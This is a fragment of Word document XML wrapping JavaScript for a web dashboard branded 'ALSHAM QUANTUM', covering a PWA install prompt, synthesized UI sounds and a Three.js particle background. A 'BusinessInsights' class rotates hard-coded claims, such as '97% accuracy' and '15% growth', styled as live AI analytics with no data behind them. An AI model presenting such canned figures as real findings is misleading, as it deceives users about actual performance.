    <w:p w14:paraId="33791E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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4893B9D0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664C4B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function installPWA() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809F4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(deferredPrompt) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51023D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deferredPrompt.prompt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF127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deferredPrompt.userChoice.then((choiceResult) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07744A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(choiceResult.outcome === 'accepted') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134CD2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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎉</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ALSHAM QUANTUM PWA instalado!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053310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130AD0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deferredPrompt = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FB73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dismissInstall();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999E8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506E5F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5534D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7D02B31" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6815E9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function dismissInstall() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBAA9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document.getElementById('install-prompt').classList.remove('show');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330BD6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83C0322" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615123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SOUND DESIGN PREMIUM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DCA0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class QuantumSoundDesign {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE9C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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF89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this.audioContext = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BE8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this.sounds = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C3FD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this.enabled = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D233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this.init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300BBA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CECB227" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7B55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async init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E55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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5473B1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this.audioContext = new (window.AudioContext || window.webkitAudioContext)();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757AA6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this.createSounds();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46E0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catch (e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232320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console.log('Web Audio API not supported');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B4F7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this.enabled = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7889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5D50D9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1A7E858" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218921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createSounds() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D357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this.sounds = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD71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cycle: () =&gt; this.playQuantumTone(440, 0.1, 'sine'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168965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hover: () =&gt; this.playQuantumTone(220, 0.05, 'triangle'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301367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click: () =&gt; this.playQuantumTone(880, 0.08, 'square'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737687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notification: () =&gt; this.playQuantumTone(660, 0.15, 'sawtooth'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25303F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success: () =&gt; this.playQuantumChord([440, 554, 659], 0.2),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F5E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error: () =&gt; this.playQuantumTone(200, 0.3, 'sawtooth')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399CA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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF041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51C25A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DDA4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async playQuantumTone(frequency, duration, type = 'sine') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79092A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(!this.enabled || !this.audioContext) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA35C3B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69162E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(this.audioContext.state === 'suspended') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1308BA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await this.audioContext.resume();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB0D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E9B96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31F8DC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oscillator = this.audioContext.createOscillator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3335F0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gainNode = this.audioContext.createGain();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37572A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2612A4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oscillator.connect(gainNode);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343C2B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gainNode.connect(this.audioContext.destination);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C63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A7334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oscillator.frequency.setValueAtTime(frequency, this.audioContext.currentTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFEB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oscillator.type = type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA4D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CCEF1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gainNode.gain.setValueAtTime(0, this.audioContext.currentTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A05CF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gainNode.gain.linearRampToValueAtTime(0.03, this.audioContext.currentTime + 0.01);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0801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gainNode.gain.exponentialRampToValueAtTime(0.001, this.audioContext.currentTime + duration);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1D7D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863BA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oscillator.start(this.audioContext.currentTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E8C4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oscillator.stop(this.audioContext.currentTime + duration);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C66E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78A6A88" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1425E6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async playQuantumChord(frequencies, duration) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09C4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frequencies.forEach(freq =&gt; this.playQuantumTone(freq, duration));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC24F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B7D9957" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7054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play(soundName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C741C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(this.sounds[soundName] &amp;&amp; this.enabled) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D76CE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this.sounds[soundName]();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D5D5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636CE5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63AD09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064E204" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393F62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QUANTUM PARTICLES SYSTEM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAA52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class QuantumParticlesSystem {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541E7C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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AAA8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this.scene = new THREE.Scene();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1C5B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this.camera = new THREE.PerspectiveCamera(75, window.innerWidth / window.innerHeight, 0.1, 1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0FA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this.renderer = new THREE.WebGLRenderer({ alpha: true, antialias: true });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E672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this.particles = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CD5D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this.mouse = { x: 0, y: 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7191C6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this.init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007112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CE53742" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5085A7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init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327245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container = document.getElementById('particles-container');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6D1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(!container) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20350E98" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7D8F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this.renderer.setSize(window.innerWidth, window.innerHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F3F0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this.renderer.setClearColor(0x000000, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F8A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container.appendChild(this.renderer.domElement);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50CBA1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A0C0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this.camera.position.z = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0F30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this.createQuantumParticles();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C007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this.animate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D97E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this.bindEvents();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFB1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6CE51781" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC3B0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createQuantumParticles() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D602C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geometry = new THREE.SphereGeometry(0.012, 8, 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F10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1A3EC5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(let i = 0; i &lt; 120; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753575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material = new THREE.MeshBasicMaterial({ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8CA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color: this.getCurrentThemeColor(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CCB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transparent: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3962D1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opacity: 0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E55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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B6E575" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288D9D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particle = new THREE.Mesh(geometry, material);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD5D7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particle.position.set(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBCE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(Math.random() - 0.5) * 18,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EF37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(Math.random() - 0.5) * 18,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74210E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(Math.random() - 0.5) * 18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C7D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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC90B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57D541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particle.userData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40DF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velocity: new THREE.Vector3(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C134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(Math.random() - 0.5) * 0.008,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790CB5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(Math.random() - 0.5) * 0.008,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E54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(Math.random() - 0.5) * 0.008</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020FC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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A0E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originalPosition: particle.position.clone(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51958E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oscillation: Math.random() * Math.PI * 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188DD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quantumFreq: Math.random() * 0.02 + 0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9814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2766BA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2B0FD5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this.scene.add(particle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197393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this.particles.push(particle);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FF73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3FF130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2D2111C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE712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getCurrentThemeColor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC61B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style = getComputedStyle(document.body);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612729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color = style.getPropertyValue('--particles-color').trim() || '#F4D03F';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366378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color;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212293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680B3CB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527E51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animate() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531BDE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requestAnimationFrame(() =&gt; this.animate());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4134C6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339279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time = Date.now() * 0.001;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153DC1BB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3DD5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this.particles.forEach((particle, index) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48266E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Quantum oscillation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055762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particle.userData.oscillation += particle.userData.quantumFreq;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046100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particle.position.y += Math.sin(particle.userData.oscillation) * 0.0008;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184CB6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particle.position.x += Math.cos(particle.userData.oscillation * 1.3) * 0.0006;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F06F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0FDF5D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Base movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0708F2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particle.position.add(particle.userData.velocity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41B20C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5876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Mouse quantum entanglement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1E3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(this.mouse.x !== 0 &amp;&amp; this.mouse.y !== 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371AF1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mouseInfluence = 0.0001;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9D0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distance = particle.position.distanceTo(new THREE.Vector3(this.mouse.x * 3, -this.mouse.y * 3, 0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC30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(distance &lt; 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA7EF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particle.position.x += this.mouse.x * mouseInfluence * (3 - distance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA662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particle.position.y += -this.mouse.y * mouseInfluence * (3 - distance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920DE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2CFCE0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7C35C9E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368EA9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Quantum field reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A135C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(particle.position.distanceTo(particle.userData.originalPosition) &gt; 10) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCCE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particle.position.copy(particle.userData.originalPosition);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C6A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particle.position.add(new THREE.Vector3(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F678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(Math.random() - 0.5) * 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70AB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(Math.random() - 0.5) * 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068D1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(Math.random() - 0.5) * 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602830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));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D187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0157C73F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8367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Quantum rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F378C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particle.rotation.x += 0.003;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611FD7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particle.rotation.y += 0.003;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA912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particle.rotation.z += 0.001;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E75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6367FF52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BACC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this.renderer.render(this.scene, this.camera);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431D6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70C2669" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382A73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bindEvents() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F97D1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window.addEventListener('mousemove', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54E5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this.mouse.x = (event.clientX / window.innerWidth) * 2 - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE49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this.mouse.y = -(event.clientY / window.innerHeight) * 2 + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576CA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6933291F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABD6B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window.addEventListener('resize', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD57E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this.camera.aspect = window.innerWidth / window.innerHeight;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56B4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this.camera.updateProjectionMatrix();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6551D4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this.renderer.setSize(window.innerWidth, window.innerHeight);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F507E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1E1945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A904E6F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1DCD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updateTheme() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56AF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newColor = this.getCurrentThemeColor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679645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this.particles.forEach(particle =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE479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particle.material.color.setStyle(newColor);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0442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107D1E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AF72428" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6632CB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destroy() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C622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(this.renderer &amp;&amp; this.renderer.domElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A2B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this.renderer.domElement.remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F69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A553A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2B162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A1B4AB7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640E46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BUSINESS INSIGHTS SYSTEM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE4F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class BusinessInsights {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44309D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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1813B6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this.insights = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D92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Revenue optimization algorithms detected 15% growth opportunity",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE4E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Market analysis shows premium segment expansion potential",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081296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Customer behavior patterns indicate new product demand",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C18A8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💡</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Predictive models suggest Q1 performance will exceed targets",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD44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AI-driven cost reduction initiatives showing 8% efficiency gain",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5749FF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📈</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Global commerce metrics indicate strong market position",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD615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🔮</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Neural networks predict favorable market conditions ahead",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C143D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💎</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Enterprise optimization protocols yielding superior results",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8563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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Quantum processing delivering unprecedented analytical depth",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B33E0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🏢</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Strategic AI recommendations validated with 97% accuracy"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1029FF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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3637A2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this.currentIndex = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F62F0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this.startRotation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0C2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AEA215E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="430EEB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startRotation() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6CFA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setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C622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this.updateInsight();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E40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}, 7000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CC0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12FED1A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A7B9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updateInsight() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B922E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element = document.getElementById('business-insight');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521653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(element) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D914A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element.style.opacity = '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EBB1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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3204B0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element.textContent = this.insights[this.currentIndex];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6B8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element.style.opacity = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1733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this.currentIndex = (this.currentIndex + 1) % this.insights.length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1123F0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 200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD0BF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53DF7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53C1A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DD1535F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="627870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QUANTUM WEBSOCKET MANAGER =====</w:t>
      </w:r>
    </w:p>
